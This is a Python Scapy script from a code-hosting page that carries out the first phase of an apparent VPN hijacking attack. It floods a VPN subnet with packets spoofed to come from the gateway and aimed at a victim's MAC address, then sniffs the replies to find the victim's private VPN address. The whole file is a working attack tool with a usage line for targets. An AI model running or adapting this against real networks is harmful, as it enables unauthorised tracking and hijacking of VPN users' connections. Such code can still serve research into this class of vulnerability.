You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

155 lines
3.9 KiB

  1. #!/usr/bin/env python3
  2. from scapy.all import *
  3. import ipaddress
  4. from threading import Thread, Event
  5. from time import sleep
  6. import os
  7. #
  8. #
  9. #
  10. #
  11. # Thread classes for sniffing
  12. #
  13. # Sniffer Class all grabbed from https://www.cybrary.it/0p3n/sniffing-inside-thread-scapy-python/
  14. class Sniffer(Thread):
  15. def __init__(self, iface="en0"):
  16. super().__init__()
  17. self.daemon = True
  18. self.vpn_addr = None
  19. self.current_phase = 1
  20. self.spoof_count = 0
  21. self.spoof_port = 0
  22. self.socket = None
  23. self.iface = iface
  24. self.stop_sniffer = Event()
  25. def run(self):
  26. self.socket = conf.L2listen(
  27. type=ETH_P_ALL,
  28. iface=self.iface,
  29. filter="ip"
  30. )
  31. sniff(
  32. opened_socket=self.socket,
  33. prn=self.handle_packet,
  34. )
  35. def join(self, timeout=None):
  36. self.stop_sniffer.set()
  37. super().join(timeout)
  38. def get_vpn_addr(self):
  39. return self.vpn_addr
  40. def set_phase(self, phase):
  41. self.current_phase = phase
  42. def check_for_req(self, packet):
  43. ip_layer = packet.getlayer(IP)
  44. # for phase 1 (on ubuntu 19) we wanna look for a reset
  45. # with source of private vpn address and dest of gateway
  46. if self.current_phase == 1:
  47. if "10." in ip_layer.src:
  48. if ip_layer.src == self.vpn_addr:
  49. print("multiple matches for: " + str(self.vpn_addr))
  50. # could make the scan stop after this point but
  51. # only takes a second or two to finish up
  52. print("Victim private ip is: " + str(ip_layer.src))
  53. self.vpn_addr = ip_layer.src
  54. def handle_packet(self, packet):
  55. #ip_layer = packet.getlayer(IP)
  56. #print("[!] New Packet: {src} -> {dst}".format(src=ip_layer.src, dst=ip_layer.dst))
  57. # if its not an SSH packet then check for challenge acks
  58. #
  59. if TCP in packet:
  60. tcp_sport = packet[TCP].sport
  61. tcp_dport = packet[TCP].dport
  62. if (tcp_sport != 2222 and tcp_dport != 2222) or (tcp_sport != 22 and tcp_dport != 22):
  63. self.check_for_req(packet)
  64. ############
  65. def phase_one_spread(gateway_ip, dst_net, iface="en0", edst="08:00:27:5c:c9:d1",
  66. sport=50505, dport=443, flags="SA"):
  67. pieces = gateway_ip.split('.')
  68. src = pieces[0] + '.' + pieces[1] + '.' + pieces[2] + '.1'# should be gateway of LAN
  69. src = gateway_ip
  70. eth = Ether(dst=edst)
  71. tcps = TCP(sport=sport,dport=dport,flags=flags) # src and dst ports don't matter
  72. for ip in ipaddress.IPv4Network(dst_net + '/24'):
  73. print('{} to: {}'.format(flags, str(ip)))
  74. ip_pack = IP(src = src, dst = str(ip))
  75. sendp(eth/ip_pack/tcps, iface=iface, count=2, verbose=0)
  76. print("\nFinished spreading to private address space.")
  77. def main():
  78. if len(sys.argv) < 5:
  79. print("Usage:\n{} {} {} {} {} [{}] [{}]".format(
  80. sys.argv[0], "<GATEWAY_IP>", "<VPN SUBNET>", "<IFACE>", "<VICTIM_MAC>",
  81. "<SPORT>", "<>"))
  82. exit(-1)
  83. gateway_ip = sys.argv[1]
  84. vpn_net = sys.argv[2]
  85. iface = sys.argv[3]
  86. edst = sys.argv[4]
  87. if len(sys.argv) == 6:
  88. sport = int(sys.argv[5])
  89. else:
  90. sport = 50505
  91. if len(sys.argv) == 7:
  92. dport = int(sys.argv[6])
  93. else:
  94. dport = 443
  95. if len(sys.argv) == 8:
  96. flags = sys.argv[7]
  97. else:
  98. flags = "SA"
  99. sniffer = Sniffer(iface=iface)
  100. sniffer.start()
  101. ## Phase 1 - spread private address range passed in
  102. #
  103. sleep(.5)
  104. print("Scanning entire dest net " + str(vpn_net))
  105. phase_one_spread(gateway_ip, str(vpn_net),
  106. iface=iface, edst=edst,
  107. sport=sport, dport=dport, flags=flags)
  108. vpn_addr = sniffer.get_vpn_addr()
  109. print('Completed phase one and found client has private VPN address: ' + str(vpn_addr) + '\n\n')
  110. if __name__ == '__main__':
  111. main()